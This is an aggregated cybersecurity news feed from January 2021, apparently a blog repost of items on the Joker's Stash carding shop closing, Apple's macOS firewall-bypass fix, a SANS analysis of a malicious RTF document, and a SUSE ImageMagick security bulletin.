Network Security News Summary for Tuesday January 19th, 2021

A brief daily summary of what is important in cybersecurity. The podcast is published every weekday and designed to get you ready for the day with a brief, usually about 5 minutes long, summary of current network security-related events. The content is late breaking, educational and based on listener input as well as on input received by the SANS Internet Storm Center. You may submit questions and comments via our contact form at https://isc.sans.edu/contact.html .

The post Network Security News Summary for Tuesday January 19th, 2021 appeared first on Malware Devil.

https://malwaredevil.com/2021/01/19/network-security-news-summary-for-tuesday-january-19th-2021/?utm_source=rss&utm_medium=rss&utm_campaign=network-security-news-summary-for-tuesday-january-19th-2021

DFARS: How to Expedite Compliance

The Department of Defense’s long-anticipated DFARS Interim Rule went into effect in December 2020. The Interim Rule mandates that defense contractors not only perform a self-assessment based on NIST 800-171, but also report that score to the DoD. The Interim Rule also implicitly makes the new CMMC framework—to be implemented over the next several years—the […]

The post DFARS: How to Expedite Compliance appeared first on PreVeil.

The post DFARS: How to Expedite Compliance appeared first on Security Boulevard.

Read More

The post DFARS: How to Expedite Compliance appeared first on Malware Devil.

https://malwaredevil.com/2021/01/18/dfars-how-to-expedite-compliance/?utm_source=rss&utm_medium=rss&utm_campaign=dfars-how-to-expedite-compliance

The SolarWinds Breach: Three Security Takeaways for IT

The SolarWinds attack enforces that IT must prioritize a Zero Trust model to protect their devices, identities, and resources. Try JumpCloud Free.

The post The SolarWinds Breach: Three Security Takeaways for IT appeared first on JumpCloud.

The post The SolarWinds Breach: Three Security Takeaways for IT appeared first on Security Boulevard.

Read More

The post The SolarWinds Breach: Three Security Takeaways for IT appeared first on Malware Devil.

https://malwaredevil.com/2021/01/18/the-solarwinds-breach-three-security-takeaways-for-it/?utm_source=rss&utm_medium=rss&utm_campaign=the-solarwinds-breach-three-security-takeaways-for-it

Hackers Leaked 22 Million Records on the Dark Web in 2020

Hackers leaked over 22 million records on the Dark Web in 2020, putting your business in danger of cyberattacks. Here’s how to mitigate it.

The post Hackers Leaked 22 Million Records on the Dark Web in 2020 appeared first on Security Boulevard.

Read More

The post Hackers Leaked 22 Million Records on the Dark Web in 2020 appeared first on Malware Devil.

https://malwaredevil.com/2021/01/18/hackers-leaked-22-million-records-on-the-dark-web-in-2020/?utm_source=rss&utm_medium=rss&utm_campaign=hackers-leaked-22-million-records-on-the-dark-web-in-2020

Joker’s Stash Carding Market to Call it Quits

Joker’s Stash, by some accounts the largest underground shop for selling stolen credit card and identity data, says it’s closing up shop effective mid-February 2021. The announcement came on the heels of a turbulent year for the major cybercrime store, and just weeks after U.S. and European authorities seized a number of its servers.

The post Joker’s Stash Carding Market to Call it Quits appeared first on Security Boulevard.

Read More

The post Joker’s Stash Carding Market to Call it Quits appeared first on Malware Devil.

https://malwaredevil.com/2021/01/18/jokers-stash-carding-market-to-call-it-quits-2/?utm_source=rss&utm_medium=rss&utm_campaign=jokers-stash-carding-market-to-call-it-quits-2

Joker’s Stash Carding Market to Call it Quits

Joker’s Stash, by some accounts the largest underground shop for selling stolen credit card and identity data, says it’s closing up shop effective mid-February 2021. The announcement came on the heels of a turbulent year for the major cybercrime store, and just weeks after U.S. and European authorities seized a number of its servers.

A farewell message posted by Joker’s Stash admin on Jan. 15, 2021.

The Russian and English language carding store first opened in October 2014, and quickly became a major source of “dumps” — information stolen from compromised payment cards that thieves can buy and use to create physical counterfeit copies of the cards.

But 2020 turned out to be a tough year for Joker’s Stash. As cyber intelligence firm Intel 471 notes, the curator of the store announced in October that he’d contracted COVID-19, spending a week in the hospital. Around that time, Intel 471 says many of Joker’s loyal customers started complaining that the shop’s payment card data quality was increasingly poor.

“The condition impacted the site’s forums, inventory replenishments and other operations,” Intel 471 said.

Image: Gemini Advisory

That COVID diagnosis may have affected the shop owner’s ability to maintain fresh and valid inventory on his site. Gemini Advisory, a New York City-based company that monitors underground carding shops, tracked a “severe decline” in the volume of compromised payment card accounts for sale on Joker’s Stash over the past six months.

“Joker’s Stash has received numerous user complaints alleging that card data validity is low, which even prompted the administrator to upload proof of validity through a card-testing service,” Gemini wrote in a blog post about the planned shutdown.

Image: Gemini Advisory

Then on Dec. 16, 2020, several of Joker’s long-held domains began displaying notices that the sites had been seized by the U.S. Department of Justice and Interpol. The crime shop quickly recovered, moving to new infrastructure and assuring the underground community that it would continue to operate normally.

Gemini estimates that Joker’s Stash generated more than a billion dollars in revenue over the past several years. Much of that revenue came from high-profile breaches, including tens of millions of payment card records stolen from major merchants including Saks Fifth Avenue, Lord and Taylor, Bebe Stores, Hilton Hotels, Jason’s Deli, Whole Foods, Chipotle, Wawa, Sonic Drive-In, the Hy-Vee supermarket chain, Buca Di Beppo, and Dickey’s BBQ.

Joker’s Stash routinely teased big breaches days or weeks in advance of selling payment card records stolen from those companies, and periodically linked to this site and other media outlets as proof of his shop’s prowess and authenticity.

Like many other top cybercrime bazaars, Joker’s Stash was a frequent target of phishers looking to rip off unwary or unsophisticated thieves. In 2018, KrebsOnSecurity detailed a vast network of fake Joker’s Stash sites set up to steal login credentials and bitcoin. The phony sites all traced back to the owners of a Pakistani web site design firm. Many of those fake sites are still active (e.g. jokersstash[.]su).

As noted here in 2016, Joker’s Stash attracted an impressive number of customers who kept five and six-digit balances at the shop, and who were granted early access to new breaches as well as steep discounts for bulk buys. Those “partner” customers will be given the opportunity to cash out their accounts. But the majority of Stash customers do not enjoy this status, and will have to spend their balances by Feb. 15 or forfeit those funds.

The dashboard for a Joker’s Stash customer who’s spent over $10,000 buying stolen credit cards from the site.

Gemini said another event that may have contributed to this threat actor shutting down their marketplace is the recent spike in the value of Bitcoin. A year ago, one bitcoin was worth about $9,000. Today a single bitcoin is valued at more than $35,000.

“JokerStash was an early advocate of Bitcoin and claims to keep all proceeds in this cryptocurrency,” Gemini observed in a blog post. “This actor was already likely to be among the wealthiest cybercriminals, and the spike may have multiplied their fortune, earning them enough money to retire. However, the true reason behind this shutdown remains unclear.”

If the bitcoin price theory holds, that would be fairly rich considering the parting lines in the closure notice posted to Joker’s Stash.

“We are also want to wish all young and mature ones cyber-gangsters not to lose themselves in the pursuit of easy money,” the site administrator(s) advised. “Remember, that even all the money in the world will never make you happy and that all the most truly valuable things in this life are free.”

Regardless, the impending shutdown is unlikely to have much of an impact on the overall underground carding industry, Gemini notes.

“Given Joker’s Stash’s high profile, it relied on a robust network of criminal vendors who offered their stolen records on this marketplace, among others,” the company wrote. “Gemini assesses with a high level of confidence that these vendors are very likely to fully transition to other large, top-tier dark web marketplaces.”

Read More

The post Joker’s Stash Carding Market to Call it Quits appeared first on Malware Devil.

https://malwaredevil.com/2021/01/18/jokers-stash-carding-market-to-call-it-quits/?utm_source=rss&utm_medium=rss&utm_campaign=jokers-stash-carding-market-to-call-it-quits

Capitol Rioters ID’ed With Help From Dating Apps

Dating apps and grassroots users are passing evidence of rioters’ identities to law enforcement. But privacy wonks are worried.

The post Capitol Rioters ID’ed With Help From Dating Apps appeared first on Security Boulevard.

Read More

The post Capitol Rioters ID’ed With Help From Dating Apps appeared first on Malware Devil.

https://malwaredevil.com/2021/01/18/capitol-rioters-ided-with-help-from-dating-apps/?utm_source=rss&utm_medium=rss&utm_campaign=capitol-rioters-ided-with-help-from-dating-apps

The Growing Importance of Security Assurance (And What It Means to Be Good at Compliance Operations)

Living through a global pandemic has made life tough for every human on the planet—some far more than …

Read More

The post The Growing Importance of Security Assurance (And What It Means to Be Good at Compliance Operations) appeared first on Hyperproof.

The post The Growing Importance of Security Assurance (And What It Means to Be Good at Compliance Operations) appeared first on Security Boulevard.

Read More

The post The Growing Importance of Security Assurance (And What It Means to Be Good at Compliance Operations) appeared first on Malware Devil.

https://malwaredevil.com/2021/01/18/the-growing-importance-of-security-assurance-and-what-it-means-to-be-good-at-compliance-operations/?utm_source=rss&utm_medium=rss&utm_campaign=the-growing-importance-of-security-assurance-and-what-it-means-to-be-good-at-compliance-operations

WhatsApp Data Privacy | Avast

Earlier this month, WhatsApp gave its users an ultimatum: accept new data sharing terms or delete their accounts. For some of its billion global users, this was not received well, especially since some of your data would be shared across all of Facebook’s other operations.

The post WhatsApp Data Privacy | Avast appeared first on Security Boulevard.

Read More

The post WhatsApp Data Privacy | Avast appeared first on Malware Devil.

https://malwaredevil.com/2021/01/18/whatsapp-data-privacy-avast/?utm_source=rss&utm_medium=rss&utm_campaign=whatsapp-data-privacy-avast

Dr. Martin Luther King, Jr. Day 2021

The post Dr. Martin Luther King, Jr. Day 2021 appeared first on Security Boulevard.

Read More

The post Dr. Martin Luther King, Jr. Day 2021 appeared first on Malware Devil.

https://malwaredevil.com/2021/01/18/dr-martin-luther-king-jr-day-2021/?utm_source=rss&utm_medium=rss&utm_campaign=dr-martin-luther-king-jr-day-2021

Details on the New NIST Requirement for RASP and IAST

If you’re looking for more information on the latest update to the NIST (National Institute of Standards and Technologies) Security and Privacy Framework outlined in SP800-53, there’s a new article just published in the Cutter Business Technology Journal detailing the changes, the timing and an explanation of the new technologies (RASP and IAST) added to the framework.

The post Details on the New NIST Requirement for RASP and IAST appeared first on K2io.

The post Details on the New NIST Requirement for RASP and IAST appeared first on Security Boulevard.

Read More

The post Details on the New NIST Requirement for RASP and IAST appeared first on Malware Devil.

https://malwaredevil.com/2021/01/18/details-on-the-new-nist-requirement-for-rasp-and-iast/?utm_source=rss&utm_medium=rss&utm_campaign=details-on-the-new-nist-requirement-for-rasp-and-iast

Apple Removes macOS Feature That Allowed Apps to Bypass Firewall Security

Apple has removed a controversial feature from its macOS operating system that allowed the company’s own first-party apps to bypass content filters, VPNs, and third-party firewalls.

Called “ContentFilterExclusionList,” it included a list of as many as 50 Apple apps like iCloud, Maps, Music, FaceTime, HomeKit, the App Store, and its software update service that were routed through Network Extension Framework, effectively circumventing firewall protections.

This exclusion list has been scrubbed now from macOS 11.2 beta 2.

The issue first came to light last October following the release of macOS Big Sur, prompting concerns from security researchers who said the feature was ripe for abuse, adding it could be leveraged by an attacker to exfiltrate sensitive data by piggybacking it on to legitimate Apple apps included on the list and then bypass firewalls and security software.

“After lots of bad press and lots of feedback/bug reports to Apple from developers such as myself, it seems wiser (more security conscious) minds at Cupertino prevailed,” said Patrick Wardle, a principal security researcher with Jamf, last week.

Researchers, including Wardle, found last year that Apple’s apps were being excluded from NEFilterDataProvider, a network content filter that makes it possible for firewall and VPN apps such as LuLu and Little Snitch to monitor and control data traffic from installed apps on the system.

Wardle demonstrated an instance of how malicious apps could exploit this firewall bypass to transmit data to an attacker-controlled server using a simple Python script that latched the traffic onto an Apple exempted app despite setting LuLu and Little Snitch to block all outgoing connections on a Mac running Big Sur.

With this new change, socket filter firewalls such as LuLu can now comprehensively filter/block all network traffic, including those from Apple apps.

The updates come as Apple deprecated support for Network Kernel Extensions in 2019 in favor of Network Extensions Framework.

We have reached out to Apple, and we’ll update the story if we hear back.

Found this article interesting? Follow THN on Facebook, Twitter and LinkedIn to read more exclusive content we post.

Read More

The post Apple Removes macOS Feature That Allowed Apps to Bypass Firewall Security appeared first on Malware Devil.

https://malwaredevil.com/2021/01/18/apple-removes-macos-feature-that-allowed-apps-to-bypass-firewall-security-2/?utm_source=rss&utm_medium=rss&utm_campaign=apple-removes-macos-feature-that-allowed-apps-to-bypass-firewall-security-2

Managing Identities and Entitlements to Secure the Public Cloud

Accelerated digital transformation in response to the pandemic has blurred the line between the public cloud and the internal network, creating a much more complex environment that organizations still struggle to secure. One particularly troublesome area is managing identities and entitlements. The COVID-19 pandemic forced many businesses to transition to a remote and distributed workforce,..

The post Managing Identities and Entitlements to Secure the Public Cloud  appeared first on Security Boulevard.

Read More

The post Managing Identities and Entitlements to Secure the Public Cloud  appeared first on Malware Devil.

https://malwaredevil.com/2021/01/18/managing-identities-and-entitlements-to-secure-the-public-cloud/?utm_source=rss&utm_medium=rss&utm_campaign=managing-identities-and-entitlements-to-secure-the-public-cloud

Hackers Calling Fair Game on Healthcare Institutions

The year 2019 saw big consumer brands get hacked: from Facebook to Capital One, every day people were urged to double-check their bank accounts and credit card statements to ensure their information had not been stolen. The prime target: all of your personal data. The year 2020 was a completely different animal, and the new..

The post Hackers Calling Fair Game on Healthcare Institutions appeared first on Security Boulevard.

Read More

The post Hackers Calling Fair Game on Healthcare Institutions appeared first on Malware Devil.

https://malwaredevil.com/2021/01/18/hackers-calling-fair-game-on-healthcare-institutions/?utm_source=rss&utm_medium=rss&utm_campaign=hackers-calling-fair-game-on-healthcare-institutions

Doc & RTF Malicious Document, (Mon, Jan 18th)

A reader pointed us to a malicious Word document.

First, I run my strings.py command on it, with option -a to get statistics (see my diary entry “Strings 2021“).

There aren’t any long strings in this file (the longest is 33 characters). So there isn’t a payload here that we can extract directly, like we did in diary entry “Maldoc Strings Analysis“.

Let’s check if there are URLs in this file, by grepping for http:

Unfortunately, none.

Let’s take a look at the longest strings (-n 20: strings at least 20 characters long):

If you are a bit familiar with the internals of Word documents, you might recognize this as the name of XML files found inside OOXML files (.docx, .docm, .xlsx, …).

Let’s try oledump.py:

This means that there are no OLE files inside this OOXML file, hence no VBA macros.

Since an OOXML is an OPC file, e.g. a ZIP container, let’s take a look with my tool zipdump.py:

It looks like this OOXML file only contains XML files (extensions .xml and .rels). Let’s verify by getting statistics of the content of the contained files, by using option -e:

Here is a close look on the statisctics:

All contained files starts with <?xm and have only printable ASCII characters (except one file with 90 bytes >= 127).

So we have no binary files in here, just text files. One possible scenario, is that this .docx file contains a reference (URL) to a malicious payload.

Next step, is to extract all files and search for URLs in them. Now, in Office OOXML files, you will find a lot of legitimate URLs. To get an idea of what type of URLs we have in this document, we use my re-search.py tool to extract URLs, and display a unique list of hostnames found in these URLS, like this:

The following hostnames are legitimate, and found in Office OOXML files:

schemas.openxmlformats.org
schemas.microsoft.com
purl.org
www.w3.org

But the IP address is not. So let’s extract the full URLs now, and grep for 104:

I downloaded this document. Let’s start again with strings:

4555 characters long: this might be a payload. Let’s take a look:

This looks like a lot of hexadecimal data. That’s interesting. And notice the 3 curly braces at the end. Hexadecimal data and curly braces: this might be a malicious RTF document. Let’s check with the file command (I use my tool file-magic.py on Windows):

This is indeed an RTF file. RTF files can not contain VBA code. If they are malicious, they often contain an exploit, stored as (obfuscated) hexadecimal characters inside the RTF file. Hence the strings command will not be of much use.

I recently updated my tool rtfdump.py to make analysis of embedded objects (like malicious payloads) easier. We use the new option -O to get an overview of all objects found inside this RTF file:

There’s one object with name equation… . It’s very likely that this is an exploit for the equation editor, and that we have to extract and analyze shellcode.

Let’s extract this payload and write it to a file:

Let’s see if there are some intesting strings:

Nothing interesting.

The equation editor that is targeted here, only exists as a 32-bit executable. Hence the shellcode must also be 32-bit, and we can use the shellcode emulator scdbg to help us.

We use option -f findsc to let scdbg search for entrypoints, option -r to produce a report, and -f shellcode to pass the shellcode file for analysis:

The shellcode emulator found 4 entry points (numbered 0 to 3). I select entry point 0. This results in the emulation of shellcode, that calls the Win32 API (GetProcAddress, …). This is clearly 32-bit Windows shellcode. And it decodes itself into memory. We can use option -d to dump the decoded shellcode:

This creates a file: shellcode.unpack. Let’s use strings again on this file:

This looks more promising. What are the longest strings:

And finally, we have our URL.

 

 

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Read More

The post Doc & RTF Malicious Document, (Mon, Jan 18th) appeared first on Malware Devil.

https://malwaredevil.com/2021/01/18/doc-rtf-malicious-document-mon-jan-18th/?utm_source=rss&utm_medium=rss&utm_campaign=doc-rtf-malicious-document-mon-jan-18th

Apple Removes macOS Feature That Allowed Apps to Bypass Firewall Security

Apple has removed a controversial feature from its macOS operating system that allowed the company’s own first-party apps to bypass content filters, VPNs, and third-party firewalls.
Called “ContentFilterExclusionList,” it included a list of as many as 50 Apple apps like iCloud, Maps, Music, FaceTime, HomeKit, the App Store, and its software update service that were routed through Network
Read More

The post Apple Removes macOS Feature That Allowed Apps to Bypass Firewall Security appeared first on Malware Devil.

https://malwaredevil.com/2021/01/18/apple-removes-macos-feature-that-allowed-apps-to-bypass-firewall-security/?utm_source=rss&utm_medium=rss&utm_campaign=apple-removes-macos-feature-that-allowed-apps-to-bypass-firewall-security

The Capital Riot: First Amendment and Deplatforming, Cybersecurity Lessons Learned

This week co-host Kevin Johnson joins me to discuss the cybersecurity lessons learned from the US Capital riot, why deplatforming is not violating first amendment rights, and much more. ** Links mentioned on the show ** Check out our series on how to break into a cybersecurity career https://sharedsecurity.net/2021/01/04/how-to-break-into-to-a-cybersecurity-career-part-1/ https://sharedsecurity.net/2021/01/11/how-to-break-into-a-cybersecurity-career-part-2-with-rafal-los/ What the First Amendment actually […]

The post The Capital Riot: First Amendment and Deplatforming, Cybersecurity Lessons Learned appeared first on The Shared Security Show.

The post The Capital Riot: First Amendment and Deplatforming, Cybersecurity Lessons Learned appeared first on Security Boulevard.

Read More

The post The Capital Riot: First Amendment and Deplatforming, Cybersecurity Lessons Learned appeared first on Malware Devil.

https://malwaredevil.com/2021/01/18/the-capital-riot-first-amendment-and-deplatforming-cybersecurity-lessons-learned/?utm_source=rss&utm_medium=rss&utm_campaign=the-capital-riot-first-amendment-and-deplatforming-cybersecurity-lessons-learned

The Changing Dynamics of Cyber Insurance

Almost exactly a year ago, cybersecurity professionals were locked in a heated debate about insurance. While some were keen to point out that the future of the industry would need to include some form of insurance market, others argued that cyber insurance would never be worth the premiums, especially given the inherently volatile nature of […]… Read More

The post The Changing Dynamics of Cyber Insurance appeared first on The State of Security.

The post The Changing Dynamics of Cyber Insurance appeared first on Security Boulevard.

Read More

The post The Changing Dynamics of Cyber Insurance appeared first on Malware Devil.

https://malwaredevil.com/2021/01/18/the-changing-dynamics-of-cyber-insurance/?utm_source=rss&utm_medium=rss&utm_campaign=the-changing-dynamics-of-cyber-insurance

ISC Stormcast For Monday, January 18th, 2021 https://isc.sans.edu/podcastdetail.html?id=7332, (Mon, Jan 18th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Read More

The post ISC Stormcast For Monday, January 18th, 2021 https://isc.sans.edu/podcastdetail.html?id=7332, (Mon, Jan 18th) appeared first on Malware Devil.

https://malwaredevil.com/2021/01/18/isc-stormcast-for-monday-january-18th-2021-https-isc-sans-edu-podcastdetail-htmlid7332-mon-jan-18th/?utm_source=rss&utm_medium=rss&utm_campaign=isc-stormcast-for-monday-january-18th-2021-https-isc-sans-edu-podcastdetail-htmlid7332-mon-jan-18th

ESB-2021.0205 – [SUSE] ImageMagick: Multiple vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2021.0205
                      Security update for ImageMagick
                              18 January 2021

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           ImageMagick
Publisher:         SUSE
Operating System:  SUSE
Impact/Access:     Execute Arbitrary Code/Commands -- Existing Account
                   Denial of Service               -- Existing Account
                   Reduced Security                -- Existing Account
Resolution:        Patch/Upgrade
CVE Names:         CVE-2020-29599 CVE-2020-27776 CVE-2020-27775
                   CVE-2020-27774 CVE-2020-27773 CVE-2020-27772
                   CVE-2020-27771 CVE-2020-27770 CVE-2020-27769
                   CVE-2020-27768 CVE-2020-27767 CVE-2020-27766
                   CVE-2020-27765 CVE-2020-27764 CVE-2020-27763
                   CVE-2020-27762 CVE-2020-27761 CVE-2020-27760
                   CVE-2020-27759 CVE-2020-27758 CVE-2020-27757
                   CVE-2020-27756 CVE-2020-27755 CVE-2020-27754
                   CVE-2020-27753 CVE-2020-27752 CVE-2020-27751
                   CVE-2020-27750 CVE-2020-25676 CVE-2020-25675
                   CVE-2020-25674 CVE-2020-25666 CVE-2020-25665
                   CVE-2020-25664 CVE-2020-19667 

Reference:         ESB-2021.0165
                   ESB-2021.0110
                   ESB-2021.0038

Original Bulletin: 
   https://www.suse.com/support/update/announcement/2021/suse-su-202114598-1
   https://www.suse.com/support/update/announcement/2021/suse-su-20210153-1

Comment: This bulletin contains two (2) SUSE security advisories.

- --------------------------BEGIN INCLUDED TEXT--------------------

SUSE Security Update: Security update for ImageMagick

______________________________________________________________________________

Announcement ID:   SUSE-SU-2021:14598-1
Rating:            moderate
References:        #1179103 #1179202 #1179212 #1179269 #1179281 #1179311
                   #1179312 #1179313 #1179315 #1179321 #1179322 #1179327
                   #1179336 #1179338 #1179339 #1179345 #1179346 #1179347
                   #1179397
Cross-References:  CVE-2020-19667 CVE-2020-25664 CVE-2020-25666 CVE-2020-27751
                   CVE-2020-27752 CVE-2020-27753 CVE-2020-27754 CVE-2020-27755
                   CVE-2020-27759 CVE-2020-27760 CVE-2020-27761 CVE-2020-27763
                   CVE-2020-27765 CVE-2020-27767 CVE-2020-27768 CVE-2020-27769
                   CVE-2020-27771 CVE-2020-27772 CVE-2020-27775
Affected Products:
                   SUSE Linux Enterprise Server 11-SP4-LTSS
                   SUSE Linux Enterprise Point of Sale 11-SP3
                   SUSE Linux Enterprise Debuginfo 11-SP4
                   SUSE Linux Enterprise Debuginfo 11-SP3
______________________________________________________________________________

An update that fixes 19 vulnerabilities is now available.

Description:

This update for ImageMagick fixes the following issues:

  o CVE-2020-19667: Fixed a stack buffer overflow in XPM coder could result in
    a crash (bsc#1179103).
  o CVE-2020-25664: Fixed a heap-based buffer overflow in PopShortPixel (bsc#
    1179202).
  o CVE-2020-25666: Fixed an outside the range of representable values of type
    'int' and signed integer overflow (bsc#1179212).
  o CVE-2020-27751: Fixed an integer overflow in MagickCore/quantum-export.c
    (bsc#1179269).
  o CVE-2020-27752: Fixed a heap-based buffer overflow in PopShortPixel in
    MagickCore/quantum-private.h (bsc#1179346).
  o CVE-2020-27753: Fixed memory leaks in AcquireMagickMemory function (bsc#
    1179397).
  o CVE-2020-27754: Fixed an outside the range of representable values of type
    'long' and signed integer overflow at MagickCore/quantize.c (bsc#1179336).
  o CVE-2020-27755: Fixed memory leaks in ResizeMagickMemory function in
    ImageMagick/MagickCore/memory.c (bsc#1179345).
  o CVE-2020-27757: Fixed an outside the range of representable values of type
    'unsigned long long' at MagickCore/quantum-private.h (bsc#1179268).
  o CVE-2020-27759: Fixed an outside the range of representable values of type
    'int' at MagickCore/quantize.c (bsc#1179313).
  o CVE-2020-27760: Fixed a division by zero at MagickCore/enhance.c (bsc#
    1179281).
  o CVE-2020-27761: Fixed an outside the range of representable values of type
    'unsigned long' at coders/palm.c (bsc#1179315).
  o CVE-2020-27763: Fixed a division by zero at MagickCore/resize.c (bsc#
    1179312).
  o CVE-2020-27765: Fixed a division by zero at MagickCore/segment.c (bsc#
    1179311).
  o CVE-2020-27767: Fixed an outside the range of representable values of type
    'float' at MagickCore/quantum.h (bsc#1179322).
  o CVE-2020-27768: Fixed an outside the range of representable values of type
    'unsigned int' at MagickCore/quantum-private.h (bsc#1179339).
  o CVE-2020-27769: Fixed an outside the range of representable values of type
    'float' at MagickCore/quantize.c (bsc#1179321).
  o CVE-2020-27771: Fixed an outside the range of representable values of type
    'unsigned char' at coders/pdf.c (bsc#1179327).
  o CVE-2020-27772: Fixed an outside the range of representable values of type
    'unsigned int' at coders/bmp.c (bsc#1179347).
  o CVE-2020-27775: Fixed an outside the range of representable values of type
    'unsigned char' at MagickCore/quantum.h (bsc#1179338).

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:

  o SUSE Linux Enterprise Server 11-SP4-LTSS:
    zypper in -t patch slessp4-ImageMagick-14598=1
  o SUSE Linux Enterprise Point of Sale 11-SP3:
    zypper in -t patch sleposp3-ImageMagick-14598=1
  o SUSE Linux Enterprise Debuginfo 11-SP4:
    zypper in -t patch dbgsp4-ImageMagick-14598=1
  o SUSE Linux Enterprise Debuginfo 11-SP3:
    zypper in -t patch dbgsp3-ImageMagick-14598=1

Package List:

  o SUSE Linux Enterprise Server 11-SP4-LTSS (i586 ppc64 s390x x86_64):
       libMagickCore1-6.4.3.6-78.135.1
  o SUSE Linux Enterprise Server 11-SP4-LTSS (ppc64 s390x x86_64):
       libMagickCore1-32bit-6.4.3.6-78.135.1
  o SUSE Linux Enterprise Point of Sale 11-SP3 (i586):
       libMagickCore1-6.4.3.6-78.135.1
  o SUSE Linux Enterprise Debuginfo 11-SP4 (i586 ppc64 s390x x86_64):
       ImageMagick-debuginfo-6.4.3.6-78.135.1
       ImageMagick-debugsource-6.4.3.6-78.135.1
  o SUSE Linux Enterprise Debuginfo 11-SP3 (i586 s390x x86_64):
       ImageMagick-debuginfo-6.4.3.6-78.135.1
       ImageMagick-debugsource-6.4.3.6-78.135.1


References:

  o https://www.suse.com/security/cve/CVE-2020-19667.html
  o https://www.suse.com/security/cve/CVE-2020-25664.html
  o https://www.suse.com/security/cve/CVE-2020-25666.html
  o https://www.suse.com/security/cve/CVE-2020-27751.html
  o https://www.suse.com/security/cve/CVE-2020-27752.html
  o https://www.suse.com/security/cve/CVE-2020-27753.html
  o https://www.suse.com/security/cve/CVE-2020-27754.html
  o https://www.suse.com/security/cve/CVE-2020-27755.html
  o https://www.suse.com/security/cve/CVE-2020-27759.html
  o https://www.suse.com/security/cve/CVE-2020-27760.html
  o https://www.suse.com/security/cve/CVE-2020-27761.html
  o https://www.suse.com/security/cve/CVE-2020-27763.html
  o https://www.suse.com/security/cve/CVE-2020-27765.html
  o https://www.suse.com/security/cve/CVE-2020-27767.html
  o https://www.suse.com/security/cve/CVE-2020-27768.html
  o https://www.suse.com/security/cve/CVE-2020-27769.html
  o https://www.suse.com/security/cve/CVE-2020-27771.html
  o https://www.suse.com/security/cve/CVE-2020-27772.html
  o https://www.suse.com/security/cve/CVE-2020-27775.html
  o https://bugzilla.suse.com/1179103
  o https://bugzilla.suse.com/1179202
  o https://bugzilla.suse.com/1179212
  o https://bugzilla.suse.com/1179269
  o https://bugzilla.suse.com/1179281
  o https://bugzilla.suse.com/1179311
  o https://bugzilla.suse.com/1179312
  o https://bugzilla.suse.com/1179313
  o https://bugzilla.suse.com/1179315
  o https://bugzilla.suse.com/1179321
  o https://bugzilla.suse.com/1179322
  o https://bugzilla.suse.com/1179327
  o https://bugzilla.suse.com/1179336
  o https://bugzilla.suse.com/1179338
  o https://bugzilla.suse.com/1179339
  o https://bugzilla.suse.com/1179345
  o https://bugzilla.suse.com/1179346
  o https://bugzilla.suse.com/1179347
  o https://bugzilla.suse.com/1179397

- --------------------------------------------------------------------------------

SUSE Security Update: Security update for ImageMagick

______________________________________________________________________________

Announcement ID:   SUSE-SU-2021:0153-1
Rating:            moderate
References:        #1179202 #1179208 #1179212 #1179221 #1179223 #1179240
                   #1179244 #1179260 #1179268 #1179269 #1179276 #1179278
                   #1179281 #1179285 #1179311 #1179312 #1179313 #1179315
                   #1179317 #1179321 #1179322 #1179327 #1179333 #1179336
                   #1179338 #1179339 #1179343 #1179345 #1179346 #1179347
                   #1179361 #1179362 #1179397 #1179753
Cross-References:  CVE-2020-25664 CVE-2020-25665 CVE-2020-25666 CVE-2020-25674
                   CVE-2020-25675 CVE-2020-25676 CVE-2020-27750 CVE-2020-27751
                   CVE-2020-27752 CVE-2020-27753 CVE-2020-27754 CVE-2020-27755
                   CVE-2020-27756 CVE-2020-27757 CVE-2020-27758 CVE-2020-27759
                   CVE-2020-27760 CVE-2020-27761 CVE-2020-27762 CVE-2020-27763
                   CVE-2020-27764 CVE-2020-27765 CVE-2020-27766 CVE-2020-27767
                   CVE-2020-27768 CVE-2020-27769 CVE-2020-27770 CVE-2020-27771
                   CVE-2020-27772 CVE-2020-27773 CVE-2020-27774 CVE-2020-27775
                   CVE-2020-27776 CVE-2020-29599
Affected Products:
                   SUSE Linux Enterprise Module for Development Tools 15-SP2
                   SUSE Linux Enterprise Module for Desktop Applications 15-SP2
______________________________________________________________________________

An update that fixes 34 vulnerabilities is now available.

Description:

This update for ImageMagick fixes the following issues:

  o CVE-2020-25664: Fixed a heap-based buffer overflow in PopShortPixel (bsc#
    1179202).
  o CVE-2020-25665: Fixed a heap-based buffer overflow in WritePALMImage (bsc#
    1179208).
  o CVE-2020-25666: Fixed an outside the range of representable values of type
    'int' and signed integer overflow (bsc#1179212).
  o CVE-2020-25674: Fixed a heap-based buffer overflow in WriteOnePNGImage (bsc
    #1179223).
  o CVE-2020-25675: Fixed an outside the range of representable values of type
    'long' and integer overflow (bsc#1179240).
  o CVE-2020-25676: Fixed an outside the range of representable values of type
    'long' and integer overflow at MagickCore/pixel.c (bsc#1179244).
  o CVE-2020-27750: Fixed a division by zero in MagickCore/colorspace-private.h
    (bsc#1179260).
  o CVE-2020-27751: Fixed an integer overflow in MagickCore/quantum-export.c
    (bsc#1179269).
  o CVE-2020-27752: Fixed a heap-based buffer overflow in PopShortPixel in
    MagickCore/quantum-private.h (bsc#1179346).
  o CVE-2020-27752: Fixed a heap-based buffer overflow in PopShortPixel in
    MagickCore/quantum-private.h (bsc#1179346).
  o CVE-2020-27753: Fixed memory leaks in AcquireMagickMemory function (bsc#
    1179397).
  o CVE-2020-27755: Fixed memory leaks in ResizeMagickMemory function in
    ImageMagick/MagickCore/memory.c (bsc#1179345).
  o CVE-2020-27756: Fixed a division by zero at MagickCore/geometry.c (bsc#
    1179221).
  o CVE-2020-27757: Fixed an outside the range of representable values of type
    'unsigned long long' at MagickCore/quantum-private.h (bsc#1179268).
  o CVE-2020-27758: Fixed an outside the range of representable values of type
    'unsigned long long' (bsc#1179276).
  o CVE-2020-27759: Fixed an outside the range of representable values of type
    'int' at MagickCore/quantize.c (bsc#1179313).
  o CVE-2020-27760: Fixed a division by zero at MagickCore/enhance.c (bsc#
    1179281).
  o CVE-2020-27761: Fixed an outside the range of representable values of type
    'unsigned long' at coders/palm.c (bsc#1179315).
